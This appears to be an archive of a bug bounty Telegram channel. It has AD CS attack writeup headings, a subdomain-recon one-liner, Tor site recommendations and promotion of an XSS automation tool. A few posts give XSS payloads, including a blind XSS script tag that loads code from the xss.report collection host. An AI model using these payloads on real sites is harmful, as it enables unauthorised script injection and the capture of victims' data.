Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

5 812 subscribers
Post archive
Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess This writeup is mainly to document my research into AD CS attacks and provide a source of knowledge for others to learn from.
   • Active Directory Certificate Services (AD CS): A Beautifully Vulnerable and Mis-configurable Mess
   • Introduction
   • Welcome to the Family: The ESC Family
   • ESC1 - Template Misconfiguration
   • ESC2 – Template Misconfiguration: Part II
   • ESC3 – Enrollment Agent Template Misconfiguration
   • ESC4 – Template Access Control Misconfiguration
   • ESC5 – PKI Objects Access Control
   • ESC6 – Arbitrary SAN Usage
   • ESC7 – CA Permissions Misconfiguration
   • ESC8 – NTLM Relay to AD CS HTTP Endpoints
   • ESC9 – No Security Extension
   • ESC10 – Weak Certificate Mappings
   • ESC11 – Relaying NTLM to ICPR
   • ESC12 – ADCS CA on YubiHSM
   • ESC13 - OID Group Link Abuse
   • Practical Exploitation
   • Enumeration
   • Exploitation of ESC1
   • Exploitation of ESC3
   • Exploitation of ESC4
   • Exploitation of ESC6
   • Exploitation of ESC7
   • Exploitation of ESC8
   • Exploitation of ESC9
   • Exploitation of ESC10
   • Exploitation of ESC11
   • Exploitation of ESC13
   • Conclusion

Unpopular opinion👇 5 dark websites you don't know exist.📺🔎 Save it or lose it forever📌
✅1. The CIA cia Access the CIA on Tor for anonymous communication, contact info, job listings, and more without being tracked.
✅2. Onion.name @theonion Get custom (.onion) domains that make sense for your dark web site, helping visitors easily identify your site.
✅3. BBC Tor Mirror @bbc Bypass country blocks with the BBC's Tor mirror, allowing anonymous access to its website.
✅4. Elude Send and receive anonymous emails without needing personal info. Perfect for securely sharing sensitive information.
✅5. Just another library @just_anotherlibrary Access a million books in over 40 categories, from fantasy novels to biographies.
Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech
#dark #darkweb #onion #website #top #cia #bbc #kali #kalilinux #tor #bug #bugbounty #bugbountytips #anonymous #book #information #job #hacking #hackingtools #trending #reels #trendingreels #viral #learnings
https://www.instagram.com/reel/C9E_RJTSTP8/?igsh=MTc4MmM1YmI2Ng==

A quick one liner to get a list of domains associated with a target by using crt.sh!
===================
curl -s 'crt.sh/?q=tesla.com&o…' --compressed -H 'User-Agent: Mozilla/5.0' | jq -r '.[].common_name,.[].name_value' | sort -u
===================
#bugbounty #bugbountytips #cybersecurity

I am looking for a viral video editor. If anyone wants to work, let me know please, and do refer if anyone knows someone from your friends list.

This is a thread on how to find the origin IP of a particular target

Tool tool tool😱 Check out this Auto_xss tool, which allows you to automate the process from finding subdomains of a target to identifying XSS vulnerabilities. PS: DM "AUTO" and I will personally message the tool link to you.
Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech
#tool #xss #hacking #hackingtools #bugbountytips #bugbounty #bug #infosec #cyber #cyberpunk #cybersecuritytips #auto #automation #target #cybersecurity #networking #network #trending #trend #reels #viral
https://www.instagram.com/reel/C9EPMWnyAEE/?igsh=MTc4MmM1YmI2Ng==

It really works

Payloads ; RXSS : "mitsec<form/><!><details/open/ontoggle=alert(document.domain)>"@gmail.com BXSS : '"><script src=xss.report/c/username></script> #payload #bugbountytip

This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background Payload : '%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o #bugbountytips #BugBounty #payload

The bounty tip👇 I wonder why some sys-admins configure the server with sudo privileges!
👉 Save this post for later and share it with your friends. 💬 Got questions? Drop them in the comments! 🔗 Check out the link in our bio for a detailed guide.
Stay informed, stay secure! 💻🔐 👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 📲 @cipherops.tech
#cyber #cyberpunk #sys #sudo #sudouest #server #admin #hack #hacking #tip #tips #trick #kalilinux #tools #bug #bugbounty #bugbountytips #cybersecurity #cybersecuritytips
https://www.instagram.com/p/C9Cad1jSO2J/?igsh=MTc4MmM1YmI2Ng==

Chart for learning bug bounty hunting/penetration testing for beginners

❌Not even Einstein can remember all this so save it! Welcome home🏡 Hunters, today I am sharing 🤔 how to get started in BugBounty hunting. Here are the things👇
1. Understanding what BugBounty is
2. Develop your skills
3. Join BugBounty platforms
4. Start small and read previous reports
5. Stay ethical and report responsibly
Stay informed, stay secure! 💻🔐👉 Follow us for more cybersecurity tips and tricks! 🌐 Visit us at www.cipherops.xyz 🅱️ Visit for notes at book.cipheroos.xyz 🔨 Visit for my tool at github Auto_xss 📲 @cipherops.tech @hacker_hub8 @myself_immortal @cyber.techq @code_ravan @0xph03n1x0
#cyberpunk #kalilinux #bugbounty #bug #infosec #cybersecurity #cyber #beginner #getting #started #skill #skills #platforms #reporter #ethical #hacking #trending #trendingreels #post
https://www.instagram.com/p/C8_1r9CSE7V/?igsh=MTc4MmM1YmI2Ng==

Anyone know how to exploit this? We can work together on reporting.

Guys, finally my tool is ready after the update. I have attached the video of how to use it and also shown the results too. So do check it out and share it with as many people as possible. Hoping I get a lot of reactions, and please do star my tool on GitHub so that you guys don't miss any future updates. https://github.com/Adwaithsheety/Auto_xss

I will update the code and share the tool link today

waybackurl results from my tool

Updating my auto_xss tool: checking if the files already exist, and if yes then it will move to the next tool. Then removed gau and added hakrawler, waybackurl and katana to find endpoints, combine all three results and sort them into one file. In testing; the updated tool will be on GitHub very soon. If you guys want to give any suggestions with the changes you guys can

My first video, on how to install Kali Linux, has been uploaded. Please do check it out and let me know your thoughts.

Bug bounty Tips - Statistics and analytics of the Telegram channel @bugbounty_tech